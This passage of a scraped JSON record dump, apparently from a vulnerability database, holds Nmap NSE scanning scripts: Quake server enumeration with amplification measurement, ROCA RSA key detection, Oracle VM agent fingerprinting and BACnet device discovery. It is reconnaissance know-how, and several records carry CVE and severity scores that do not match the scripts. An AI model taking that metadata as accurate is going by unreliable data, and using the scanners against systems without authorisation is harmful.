\"beige10\",\n [ 0xb ] = \"green11\",\n [ 0xc ] = \"yellow12\",\n [ 0xd ] = \"blue13\"\n}\n\n\n--- Request player info from /host/:/port/ for player /id/, return\n-- player info as a table on success and raise an error on failure.\nlocal function get_player_info(host, port, id)\n local player_info = stdnse.output_table()\n local req_pl = string.pack('>I2 I2 BB',\n ctrl_pkt_type, -- packet type\n 2+2+1+1, -- packet length\n ccreq_player_info, -- operation code\n id - 1) -- player number (0 indexed)\n -- iptables -m u32 --u32 '0x1c=0x80000006&&0x1d&0xff=0x03'\n\n local status, rep_pl = comm.exchange(host, port, req_pl)\n assert_w_table(status, \"No response to request for player info\")\n assert_w_table(#rep_pl >= 4, \"Response too small for packet header\")\n\n player_info.player_ratio = string.format(\"%d/%d=%f\",\n rep_pl:len(), req_pl:len(),\n rep_pl:len()/req_pl:len() )\n\n local rep_pkt_type, rep_pl_len, pos = string.unpack('>I2 I2', rep_pl)\n assert_w_table(rep_pl_len == rep_pl:len(),\n string.format(\"Incorrect reply packet length: %d\"\n .. \" received, %d bytes in packet\",\n rep_pl_len, rep_pl:len()),\n player_info)\n local term_pos = rep_pl_len + 1\n assert_w_table(rep_pkt_type == ctrl_pkt_type,\n \"Bad reply packet type\", player_info)\n\n -- frags and connect_time are sent little endian:\n local rep_opc, player_id, name, colors, frags, connect_time, client_address, pos = string.unpack('>BBzBxxx<i4I4>z', rep_pl, pos)\n assert_w_table(pos == term_pos, \"Error parsing reply (packet type/ length)\",\n player_info)\n assert_w_table(rep_opc == ccrep_player_info,\n string.format(\"Incorrect operation code 0x%x in reply,\"\n .. \" should be 0x%x\",\n rep_opc, ccrep_player_info),\n player_info)\n\n player_info.name = name\n player_info.client_address = client_address\n player_info.connect_time = string.format(\"%d secs\", connect_time)\n player_info.frags = frags\n player_info.shirt = color_codes[colors >> 4] or \"INVALID\"\n player_info.pants = color_codes[colors & 0x0f] or \"INVALID\"\n return player_info\nend\n\n\n--- Request player info from /host/:/port/ for players [1,\n-- /cur_players/], return player infos or errors in a table.\nlocal function get_player_table(host, port, cur_players)\n local player_table = stdnse.output_table()\n for id = 1, cur_players do\n -- At this point we have established that the target is a Quake\n -- game server so lost ccreq or ccrep player info packets are\n -- merely noted in the output, they don't abort the script.\n local status, player_info = pcall(get_player_info, host, port, id)\n player_table[string.format(\"player %d\", id)] = player_info\n end\n return player_table\nend\n\n\n--- Request server info and possibly player infos from /host/:/port/,\n-- return server info and any player infos as a table on success and\n-- raise an error on failure.\nlocal function get_server_info(host, port)\n local server_info = stdnse.output_table()\n local req_pl = string.pack('>I2I2BzB',\n ctrl_pkt_type, -- packet type\n 2+2+1+game_name:len()+1+1, -- packet length\n ccreq_server_info, -- operation code\n game_name,\n net_protocol_released) -- net protocol version\n -- iptables -m u32 --u32 '0x1c=0x8000000c&&0x20=0x02515541&&0x24=0x4b450003'\n\n local status, rep_pl = comm.exchange(host, port, req_pl)\n assert_w_table(status, \"No response to request for server info\")\n assert_w_table(#rep_pl >= 4, \"Response too small for packet header\")\n\n nmap.set_port_state(host, port, 'open')\n server_info.server_ratio = string.format(\"%d/%d=%f\",\n rep_pl:len(), req_pl:len(),\n rep_pl:len()/req_pl:len())\n\n local rep_pkt_type, rep_pl_len, pos = string.unpack('>I2 I2', rep_pl)\n assert_w_table(rep_pkt_type == ctrl_pkt_type,\n string.format(\"Bad reply packet type 0x%x, expected 0x%x\",\n rep_pkt_type, ctrl_pkt_type), server_info)\n assert_w_table(rep_pl_len == rep_pl:len(),\n string.format(\"Bad reply packet length: %d received,\"\n .. \" %d bytes in packet\",\n rep_pl_len, rep_pl:len()), server_info)\n local term_pos = rep_pl_len + 1\n\n local rep_opc, pos = string.unpack('>B', rep_pl, pos)\n assert_w_table(rep_opc == ccrep_server_info,\n string.format(\"Bad operation code 0x%x in reply,\"\n .. \" expected 0x%x\",\n rep_opc, ccrep_server_info), server_info)\n local server_address, server_host_name, level_name, cur_players, max_players, net_protocol_version, pos = string.unpack('>zzzBBB', rep_pl, pos)\n assert_w_table(pos == term_pos, \"Error parsing reply (packet type/length)\",\n server_info)\n\n port.version.name = \"quake\"\n port.version.product = \"Quake 1 server\"\n port.version.version = net_protocol_versions[net_protocol_version]\n nmap.set_port_version(host, port)\n\n local player_table = get_player_table(host, port, cur_players)\n\n server_info.listen_address = server_address\n server_info.server_name = server_host_name\n server_info.level_name = level_name\n server_info.players = string.format(\"%d/%d\", cur_players, max_players)\n server_info.player_table = player_table\n server_info.protocol_version = string.format(\n \"%s (0x%x)\",\n net_protocol_versions[net_protocol_version], net_protocol_version)\n return server_info\nend\n\n\n--- Return a function from structured to unstructured output indenting\n-- nested tables /offset/ or two spaces with special treatment of name\n-- keys and optionally using /xlate_key/ to format keys.\nlocal function make_formatter(offset, xlate_key)\n offset = offset or 2\n xlate_key = xlate_key or function(key) return key:gsub(\"_\", \" \") end\n\n --- Format /results_table/ as a string starting /indent/ or zero\n -- steps from the margin for the name key and adding offset steps\n -- for other table contents and again for the contents of nested\n -- tables.\n local function formatter(results_table, indent)\n indent = indent or 0\n local output = {}\n\n if results_table.name then\n table.insert(output,\n string.format(\"%s%s\", ({ [ false ] = \": \",\n [ true ] = \"\\n\" })[indent == 0],\n results_table.name))\n end\n\n for key, value in pairs(results_table) do\n -- name is printed already\n if key ~= 'name' then\n if type(value) == 'table' then\n table.insert(output,\n string.format(\"\\n%s%s\",\n string.rep(\" \", indent + offset),\n xlate_key(key)))\n table.insert(output, formatter(value, indent + offset))\n else\n table.insert(output,\n string.format(\"\\n%s%s: %s\",\n string.rep(\" \", indent + offset),\n xlate_key(key), value))\n end\n end\n end\n return table.concat(output, '')\n end\n\n return formatter\nend\n\n\n--- Use /formatter/ to produce unstructured output from\n-- /results_table/ considering /status/. Return structured and\n-- unstructured output.\nlocal function collate_results(formatter, status, results_table)\n if not status and nmap.debugging() < 1 then\n return nil\n end\n return results_table, formatter(results_table)\nend\n\n\n--- Nmap entry point.\nfunction action(host, port)\n local xlate_table = {\n player_ratio = \"player info exchange payload amplification\",\n server_ratio = \"server info exchange payload amplification\",\n }\n\n local function xlate_key(key)\n return xlate_table[key] or key:gsub(\"_\", \" \")\n end\n\n return collate_results(make_formatter(nil, xlate_key),\n pcall(get_server_info, host, port))\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:03", "description": "Detects RSA keys vulnerable to Return Of Coppersmith Attack (ROCA) factorization. \n\nSSH hostkeys and SSL/TLS certificates are checked. The checks require recent updates to the openssl NSE library. \n\nReferences: \n\n * <https://crocs.fi.muni.cz/public/papers/rsa_ccs17>\n\n### See also:\n\n * [ ssl-cert.nse ](<../scripts/ssl-cert.html>)\n * [ ssh-hostkey.nse ](<../scripts/ssh-hostkey.html>)\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 22,443 --script rsa-vuln-roca <target>\n \n\n## Script Output \n\n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [openssl](<../lib/openssl.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [ssh2](<../lib/ssh2.html>)\n * [sslcert](<../lib/sslcert.html>)\n * [math](<>)\n * [string](<>)\n * [vulns](<../lib/vulns.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-18T20:26:42", "type": "nmap", "title": "rsa-vuln-roca NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-24T19:36:04", "id": "NMAP:RSA-VULN-ROCA.NSE", "href": "https://nmap.org/nsedoc/scripts/rsa-vuln-roca.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal openssl = stdnse.silent_require \"openssl\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal ssh2 = require \"ssh2\"\nlocal sslcert = require \"sslcert\"\nlocal math = require \"math\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects RSA keys vulnerable to Return Of Coppersmith Attack (ROCA) factorization.\n\nSSH hostkeys and SSL/TLS certificates are checked. The checks require recent updates to the openssl NSE library.\n\nReferences:\n* https://crocs.fi.muni.cz/public/papers/rsa_ccs17\n]]\n\n---\n-- @usage\n-- nmap -p 22,443 --script rsa-vuln-roca <target>\n--\n-- @output\n--\n--@xmloutput\n--\n-- @see ssl-cert.nse\n-- @see ssh-hostkey.nse\n\nauthor = \"Daniel Miller\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\n-- only run this script if the target host is NOT a private (RFC1918) IP address)\n-- and the port is an open SSL service\nportrule = function(host, port)\n if not openssl.bignum_div then\n stdnse.verbose1(\"This script requires the latest update to NSE's openssl library bindings.\")\n return false\n end\n -- SSH key check\n return shortport.port_or_service(22, \"ssh\")\n -- same criteria as ssl-cert.nse\n or shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function is_vulnerable (modulus)\n local dec2bn = openssl.bignum_dec2bn\n -- Prime tests used under MIT license from https://github.com/crocs-muni/roca\n local prime_tests = nmap.registry.roca_prime_tests or {\n {dec2bn(\"3\"), dec2bn(\"6\")},\n {dec2bn(\"5\"), dec2bn(\"30\")},\n {dec2bn(\"7\"), dec2bn(\"126\")},\n {dec2bn(\"11\"), dec2bn(\"1026\")},\n {dec2bn(\"13\"), dec2bn(\"5658\")},\n {dec2bn(\"17\"), dec2bn(\"107286\")},\n {dec2bn(\"19\"), dec2bn(\"199410\")},\n {dec2bn(\"23\"), dec2bn(\"8388606\")},\n {dec2bn(\"29\"), dec2bn(\"536870910\")},\n {dec2bn(\"31\"), dec2bn(\"2147483646\")},\n {dec2bn(\"37\"), dec2bn(\"67109890\")},\n {dec2bn(\"41\"), dec2bn(\"2199023255550\")},\n {dec2bn(\"43\"), dec2bn(\"8796093022206\")},\n {dec2bn(\"47\"), dec2bn(\"140737488355326\")},\n {dec2bn(\"53\"), dec2bn(\"5310023542746834\")},\n {dec2bn(\"59\"), dec2bn(\"576460752303423486\")},\n {dec2bn(\"61\"), dec2bn(\"1455791217086302986\")},\n {dec2bn(\"67\"), dec2bn(\"147573952589676412926\")},\n {dec2bn(\"71\"), dec2bn(\"20052041432995567486\")},\n {dec2bn(\"73\"), dec2bn(\"6041388139249378920330\")},\n {dec2bn(\"79\"), dec2bn(\"207530445072488465666\")},\n {dec2bn(\"83\"), dec2bn(\"9671406556917033397649406\")},\n {dec2bn(\"89\"), dec2bn(\"618970019642690137449562110\")},\n {dec2bn(\"97\"), dec2bn(\"79228162521181866724264247298\")},\n {dec2bn(\"101\"), dec2bn(\"2535301200456458802993406410750\")},\n {dec2bn(\"103\"), dec2bn(\"1760368345969468176824550810518\")},\n {dec2bn(\"107\"), dec2bn(\"50079290986288516948354744811034\")},\n {dec2bn(\"109\"), dec2bn(\"473022961816146413042658758988474\")},\n {dec2bn(\"113\"), dec2bn(\"10384593717069655257060992658440190\")},\n {dec2bn(\"127\"), dec2bn(\"144390480366845522447407333004847678774\")},\n {dec2bn(\"131\"), dec2bn(\"2722258935367507707706996859454145691646\")},\n {dec2bn(\"137\"), dec2bn(\"174224571863520493293247799005065324265470\")},\n {dec2bn(\"139\"), dec2bn(\"696898287454081973172991196020261297061886\")},\n {dec2bn(\"149\"), dec2bn(\"713623846352979940529142984724747568191373310\")},\n {dec2bn(\"151\"), dec2bn(\"1800793591454480341970779146165214289059119882\")},\n {dec2bn(\"157\"), dec2bn(\"126304807362733370595828809000324029340048915994\")},\n {dec2bn(\"163\"), dec2bn(\"11692013098647223345629478661730264157247460343806\")},\n {dec2bn(\"167\"), dec2bn(\"187072209578355573530071658587684226515959365500926\")},\n }\n nmap.registry.roca_prime_tests = prime_tests\n\n --stdnse.debug1(\"Testing %s\", openssl.bignum_bn2dec(modulus))\n for _, test in ipairs(prime_tests) do\n local prime, fingerprint = test[1], test[2]\n local _, bnshift = openssl.bignum_div(modulus, prime)\n -- prime is small, so bnshift is small. Safe to convert to Lua integer\n local string_shift = openssl.bignum_bn2dec(bnshift)\n local shift = math.tointeger(string_shift)\n if not shift then\n stdnse.debug1(\"Unable to convert %s to integer\", string_shift)\n return nil\n end\n --stdnse.debug1(\"Testing mod %s, shift is %s\", openssl.bignum_bn2dec(prime), shift)\n if not openssl.bignum_is_bit_set(fingerprint, shift) then\n stdnse.debug1(\"Not vulnerable\")\n return nil\n end\n end\n stdnse.debug1(\"VULNERABLE!!!!!!\")\n\n return \"Vulnerable to ROCA\"\nend\n\nlocal function ssl_get_modulus(host, port)\n local ok, cert = sslcert.getCertificate(host, port)\n if not ok then\n stdnse.debug1(\"failed to obtain SSL certificate\")\n return nil\n end\n\n if cert.pubkey.type ~= \"rsa\" then\n stdnse.debug1(\"Non-RSA certificate, not vulnerable to ROCA\")\n return nil\n end\n\n local modulus = cert.pubkey.modulus\n if not modulus then\n stdnse.debug1(\"No modulus available; upgrade Nmap?\")\n return nil\n end\n return modulus\nend\n\nlocal function ssh_get_modulus(host, port)\n local key = ssh2.fetch_host_key( host, port, \"ssh-rsa\" )\n if not key then\n stdnse.debug1(\"No RSA hostkey, not vulnerable to ROCA\")\n return nil\n end\n local _, e, n = string.unpack(\">s4s4s4\", key.fp_input)\n return openssl.bignum_bin2bn(n)\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"ROCA: Vulnerable RSA generation\",\n state = vulns.STATE.NOT_VULN,\n -- TODO: Update when CVE is scored\n --risk_factor = \"High\",\n description = [[\n The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM)\n firmware, such as versions before 0000000000000422 - 4.34, before\n 000000000000062b - 6.43, and before 0000000000008521 - 133.33, mishandles\n RSA key generation, which makes it easier for attackers to defeat various\n cryptographic protection mechanisms via targeted attacks, aka ROCA.\n ]],\n IDS = {CVE = \"CVE-2017-15361\"},\n references = {\n \"https://crocs.fi.muni.cz/public/papers/rsa_ccs17\",\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local modulus\n if shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port) then\n modulus = ssl_get_modulus(host, port)\n elseif shortport.port_or_service(22, \"ssh\")(host, port) then\n modulus = ssh_get_modulus(host, port)\n end\n\n if modulus and is_vulnerable(modulus) then\n vuln_table.state = vulns.STATE.VULN\n end\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:51", "description": "Detects the version of an Oracle Virtual Server Agent by fingerprinting responses to an HTTP GET request and an XML-RPC method call. \n\nVersion 2.2 of Virtual Server Agent returns a distinctive string in response to an HTTP GET request. However versions 3.0 and 3.0.1 return a generic response that looks like any other BaseHTTP/SimpleXMLRPCServer. Versions 2.2 and 3.0 return a distinctive error message in response to a `system.listMethods` XML-RPC call, which however does not distinguish the two versions. Version 3.0.1 returns a response to `system.listMethods` that is different from that of both version 2.2 and 3.0. Therefore we use this strategy: (1.) Send a GET request. If the version 2.2 string is returned, return \"2.2\". (2.) Send a `system.listMethods` method call. If an error is returned, return \"3.0\" or \"3.0.1\", depending on the specific format of the error.\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 8899/tcp open ssl/ovs-agent syn-ack Oracle Virtual Server Agent 3.0 (BaseHTTP 0.3; Python SimpleXMLRPCServer; Python 2.5.2)\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-03-02T07:39:31", "type": "nmap", "title": "ovs-agent-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:OVS-AGENT-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/ovs-agent-version.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\ndescription = [[\nDetects the version of an Oracle Virtual Server Agent by fingerprinting\nresponses to an HTTP GET request and an XML-RPC method call.\n\nVersion 2.2 of Virtual Server Agent returns a distinctive string in response to an\nHTTP GET request. However versions 3.0 and 3.0.1 return a generic response that\nlooks like any other BaseHTTP/SimpleXMLRPCServer. Versions 2.2 and 3.0 return a\ndistinctive error message in response to a <code>system.listMethods</code>\nXML-RPC call, which however does not distinguish the two versions. Version 3.0.1\nreturns a response to <code>system.listMethods</code> that is different from\nthat of both version 2.2 and 3.0. Therefore we use this strategy: (1.) Send a\nGET request. If the version 2.2 string is returned, return \"2.2\". (2.) Send a\n<code>system.listMethods</code> method call. If an error is\nreturned, return \"3.0\" or \"3.0.1\", depending on the specific format of the\nerror.\n]]\n\ncategories = {\"version\"}\n\n---\n-- @output\n-- PORT STATE SERVICE REASON VERSION\n-- 8899/tcp open ssl/ovs-agent syn-ack Oracle Virtual Server Agent 3.0 (BaseHTTP 0.3; Python SimpleXMLRPCServer; Python 2.5.2)\n\nauthor = \"David Fifield\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\n\nportrule = shortport.version_port_or_service({8899})\n\nlocal function set_port_version(host, port, version, server)\n port.version.name = \"ovs-agent\"\n port.version.product = \"Oracle Virtual Server Agent\"\n port.version.version = version\n if server then\n local basehttp, python = string.match(server, \"^BaseHTTP/([%d.]+) Python/([%d.]+)\")\n if basehttp and python then\n port.version.extrainfo = string.format(\"BaseHTTP %s; Python SimpleXMLRPCServer; Python %s\", basehttp, python)\n end\n end\n nmap.set_port_version(host, port)\nend\n\nfunction action(host, port)\n local response\n local version = {}\n\n response = http.get(host, port, \"/\")\n if response.status == 200 and string.match(response.body,\n \"<title>Python: OVSAgentServer Document</title>\") then\n set_port_version(host, port, \"2.2\", response.header[\"server\"])\n return\n end\n\n -- So much for version 2.2. If the response to GET was 501, then we may\n -- have a version 3.0 or 3.0.1.\n if not (response.status == 501) then\n return\n end\n\n response = http.post(host, port, \"/\",\n {header = {[\"Content-Type\"] = \"text/xml\"}}, nil,\n \"<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>\")\n if response.status == 403 and string.match(response.body,\n \"Message: Unauthorized HTTP Access Attempt from %('[%d.]+', %d+%)!%.\") then\n set_port_version(host, port, \"3.0\", response.header[\"server\"])\n return\n elseif response.status == 403 and string.match(response.body,\n \"Message: Unauthorized access attempt from %('[%d.]+', %d+%)!%.\") then\n set_port_version(host, port, \"3.0.1\", response.header[\"server\"])\n return\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:24", "description": "Discovers and enumerates BACNet Devices collects device information based off standard requests. In some cases, devices may not strictly follow the specifications, or may comply with older versions of the specifications, and will result in a BACNET error response. Presence of this error positively identifies the device as a BACNet device, but no enumeration is possible. \n\nNote: Requests and responses are via UDP 47808, ensure scanner will receive UDP 47808 source and destination responses. \n\n<http://digitalbond.com>\n\n## Example Usage \n \n \n nmap --script bacnet-info -sU -p 47808 <host>\n \n\n## Script Output \n \n \n 47808/udp open bacnet\n | bacnet-discover:\n | Vendor ID: BACnet Stack at SourceForge (260)\n | Vendor Name: BACnet Stack at SourceForge\n | Instance Number: 260001\n | Firmware: 0.8.2\n | Application Software: 1.0\n | Object Name: SimpleServer\n | Model Name: GNU\n | Description: server\n |_ Location: USA\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [unicode](<../lib/unicode.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2014-05-28T13:54:05", "type": "nmap", "title": "bacnet-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-03-01T16:31:34", "id": "NMAP:BACNET-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/bacnet-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal unicode = require \"unicode\"\n\ndescription = [[\nDiscovers and enumerates BACNet Devices collects device information based off\nstandard requests. In some cases, devices may not strictly follow the\nspecifications, or may comply with older versions of the specifications, and\nwill result in a BACNET error response. Presence of this error positively\nidentifies the device as a BACNet device, but no enumeration is possible.\n\nNote: Requests and responses are via UDP 47808, ensure scanner will receive UDP\n47808 source and destination responses.\n\nhttp://digitalbond.com\n\n]]\n\n---\n-- @usage\n-- nmap --script bacnet-info -sU -p 47808 <host>\n--\n-- @output\n--47808/udp open bacnet\n--| bacnet-discover:\n--| Vendor ID: BACnet Stack at SourceForge (260)\n--| Vendor Name: BACnet Stack at SourceForge\n--| Instance Number: 260001\n--| Firmware: 0.8.2\n--| Application Software: 1.0\n--| Object Name: SimpleServer\n--| Model Name: GNU\n--| Description: server\n--|_ Location: USA\n--\n-- @xmloutput\n--<elem key=\"Vendor ID\">BACnet Stack at SourceForge (260)</elem>\n--<elem key=\"Vendor Name\">BACnet Stack at SourceForge</elem>\n--<elem key=\"Object-identifier\">260001</elem>\n--<elem key=\"Firmware\">0.8.2</elem>\n--<elem key=\"Application Software\">1.0</elem>\n--<elem key=\"Object Name\">SimpleServer</elem>\n--<elem key=\"Model Name\">GNU</elem>\n--<elem key=\"Description\">server</elem>\n--<elem key=\"Location\">USA</elem>\n\n\n\nauthor = {\"Stephen Hilt\", \"Michael Toecker\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"version\"}\n\n\n--\n-- Function to define the portrule as per nmap standards\n--\n--\n--\n\nportrule = shortport.version_port_or_service(47808, \"bacnet\", {\"udp\",\"tcp\"})\n\n---\n-- Table to look up the Vendor Name based on Vendor ID\n-- Table data from http://www.bacnet.org/VendorID/BACnet%20Vendor%20IDs.htm\n-- Fetched on 9/26/2015\n--\n-- @key vennum Vendor number parsed out of the BACNet packet\nlocal vendor_id = {\n [0] = \"ASHRAE\",\n [1] = \"NIST\",\n [2] = \"The Trane Company\",\n [3] = \"McQuay International\",\n [4] = \"PolarSoft\",\n [5] = \"Johnson Controls Inc.\",\n [6] = \"American Auto-Matrix\",\n [7] = \"Siemens Schweiz AG (Formerly: Landis & Staefa Division Europe)\",\n [8] = \"Delta Controls\",\n [9] = \"Siemens Schweiz AG\",\n [10] = \"Schneider Electric\",\n [11] = \"TAC\",\n [12] = \"Orion Analysis Corporation\",\n [13] = \"Teletrol Systems Inc.\",\n [14] = \"Cimetrics Technology\",\n [15] = \"Cornell University\",\n [16] = \"United Technologies Carrier\",\n [17] = \"Honeywell Inc.\",\n [18] = \"Alerton / Honeywell\",\n [19] = \"TAC AB\",\n [20] = \"Hewlett-Packard Company\",\n [21] = \"Dorsette.s Inc.\",\n [22] = \"Siemens Schweiz AG (Formerly: Cerberus AG)\",\n [23] = \"York Controls Group\",\n [24] = \"Automated Logic Corporation\",\n [25] = \"CSI Control Systems International\",\n [26] = \"Phoenix Controls Corporation\",\n [27] = \"Innovex Technologies Inc.\",\n [28] = \"KMC Controls Inc.\",\n [29] = \"Xn Technologies Inc.\",\n [30] = \"Hyundai Information Technology Co. Ltd.\",\n [31] = \"Tokimec Inc.\",\n [32] = \"Simplex\",\n [33] = \"North Building Technologies Limited\",\n [34] = \"Notifier\",\n [35] = \"Reliable Controls Corporation\",\n [36] = \"Tridium Inc.\",\n [37] = \"Sierra Monitor Corporation/FieldServer Technologies\",\n [38] = \"Silicon Energy\",\n [39] = \"Kieback & Peter GmbH & Co KG\",\n [40] = \"Anacon Systems Inc.\",\n [41] = \"Systems Controls & Instruments LLC\",\n [42] = \"Lithonia Lighting\",\n [43] = \"Micropower Manufacturing\",\n [44] = \"Matrix Controls\",\n [45] = \"METALAIRE\",\n [46] = \"ESS Engineering\",\n [47] = \"Sphere Systems Pty Ltd.\",\n [48] = \"Walker Technologies Corporation\",\n [49] = \"H I Solutions Inc.\",\n [50] = \"MBS GmbH\",\n [51] = \"SAMSON AG\",\n [52] = \"Badger Meter Inc.\",\n [53] = \"DAIKIN Industries Ltd.\",\n [54] = \"NARA Controls Inc.\",\n [55] = \"Mammoth Inc.\",\n [56] = \"Liebert Corporation\",\n [57] = \"SEMCO Incorporated\",\n [58] = \"Air Monitor Corporation\",\n [59] = \"TRIATEK LLC\",\n [60] = \"NexLight\",\n [61] = \"Multistack\",\n [62] = \"TSI Incorporated\",\n [63] = \"Weather-Rite Inc.\",\n [64] = \"Dunham-Bush\",\n [65] = \"Reliance Electric\",\n [66] = \"LCS Inc.\",\n [67] = \"Regulator Australia PTY Ltd.\",\n [68] = \"Touch-Plate Lighting Controls\",\n [69] = \"Amann GmbH\",\n [70] = \"RLE Technologies\",\n [71] = \"Cardkey Systems\",\n [72] = \"SECOM Co. Ltd.\",\n [73] = \"ABB Geb\u00e4etechnik AG Bereich NetServ\",\n [74] = \"KNX Association cvba\",\n [75] = \"Institute of Electrical Installation Engineers of Japan (IEIEJ)\",\n [76] = \"Nohmi Bosai Ltd.\",\n [77] = \"Carel S.p.A.\",\n [78] = \"AirSense Technology Inc.\",\n [79] = \"Hochiki Corporation\",\n [80] = \"Fr. Sauter AG\",\n [81] = \"Matsushita Electric Works Ltd.\",\n [82] = \"Mitsubishi Electric Corporation Inazawa Works\",\n [83] = 